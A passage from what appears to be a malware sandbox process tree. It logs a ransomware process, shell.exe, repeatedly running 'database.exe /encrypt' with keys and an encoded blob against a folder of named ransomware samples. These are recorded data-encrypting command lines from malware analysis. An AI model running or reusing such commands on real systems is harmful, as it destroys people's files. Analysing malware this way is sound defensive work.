                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.MSIL.Agent.fqnw-d1afbbebb8c29d49b2bec1b5e01cec2d786dc36ede052c35b61978fe3dca1102.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.fpnf-bc26d4efe4a5f638a12e88f589d0097e67d71c73273fedd2ede0dfe4a41c39df.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
